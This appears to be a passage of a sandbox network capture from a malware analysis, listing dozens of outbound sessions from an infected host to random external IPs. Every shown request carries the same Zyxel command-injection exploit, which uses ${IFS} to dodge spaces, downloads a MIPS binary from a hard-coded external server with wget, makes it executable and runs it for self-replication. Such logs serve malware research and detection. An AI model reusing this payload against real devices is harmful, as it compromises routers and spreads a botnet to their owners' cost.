                                                Jan 12, 2024 18:16:33.703870058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7019192.168.2.2352138172.102.131.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.703922987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7020192.168.2.2357212122.163.96.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.703990936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7021192.168.2.2351286149.107.19.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.704046011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7022192.168.2.2347572185.142.33.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.704098940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7023192.168.2.2360336152.64.79.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.704144955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7024192.168.2.233343696.228.193.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.704205036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7025192.168.2.2351648119.208.202.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.704282045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7026192.168.2.2338512207.206.244.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.704327106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7027192.168.2.2342688188.186.116.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.704370022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7028192.168.2.2338720118.210.81.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.704428911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7029192.168.2.235216624.85.225.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.704483986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7030192.168.2.2337250118.53.39.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.704518080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7031192.168.2.2337570210.213.136.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.704581976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7032192.168.2.2334056105.67.177.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.704638958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7033192.168.2.234861440.64.144.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.704694033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7034192.168.2.236058488.253.225.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.704750061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7035192.168.2.2346484134.199.54.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.704792023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7036192.168.2.2360014104.227.190.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.704854965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7037192.168.2.235437488.216.136.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.704911947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7038192.168.2.2347738146.117.233.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.704968929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7039192.168.2.2353090112.232.225.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.705025911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7040192.168.2.2354502203.38.225.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.705081940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7041192.168.2.234586457.230.174.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.705152988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7042192.168.2.2346272153.45.208.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.705212116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7043192.168.2.234024083.88.181.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.705257893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7044192.168.2.233779836.237.83.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.705305099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7045192.168.2.233938695.226.96.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.705378056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7046192.168.2.233727264.244.67.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.705426931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7047192.168.2.2335238148.75.8.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.705517054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7048192.168.2.2351028123.50.0.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.705576897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7049192.168.2.2333342190.244.34.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.705616951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7050192.168.2.2347082213.175.69.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.705663919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7051192.168.2.235114425.239.65.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.705722094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7052192.168.2.2345842138.160.154.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.705785036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7053192.168.2.2344066196.203.144.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.705842972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7054192.168.2.2349084123.220.51.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.705908060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7055192.168.2.2348666169.238.198.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.705950975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7056192.168.2.2358272146.119.31.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.706010103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7057192.168.2.2337452111.238.42.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.706064939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7058192.168.2.235483471.173.164.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.706110001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7059192.168.2.2349760105.32.200.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.706146002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7060192.168.2.235337493.19.48.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.706222057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7061192.168.2.2360402174.4.153.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.706283092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7062192.168.2.2350490221.217.75.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.706351042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7063192.168.2.2359210148.240.118.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.706406116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7064192.168.2.235396819.60.109.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.706476927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7065192.168.2.2344832196.148.137.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.706552029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7066192.168.2.2341462219.239.118.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.706597090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7067192.168.2.2346426186.197.24.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.706672907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7068192.168.2.2337028203.123.113.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.706743002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7069192.168.2.2336956206.142.240.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.706800938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7070192.168.2.235808696.157.141.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.706830025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7071192.168.2.235117650.229.56.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.706902027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7072192.168.2.2356566187.17.19.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.706955910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7073192.168.2.2339176140.41.249.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.706984043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7074192.168.2.235608045.211.139.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.707066059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7075192.168.2.234611836.146.205.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.707102060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7076192.168.2.2342010173.190.241.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.707156897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7077192.168.2.23359249.138.214.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.707210064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7078192.168.2.233411085.11.160.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.707273960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7079192.168.2.2358610126.251.131.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.707329988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7080192.168.2.2360380202.31.14.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.707376003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7081192.168.2.2339040202.165.142.83443
                                                TimestampBytes transferredDirectionData
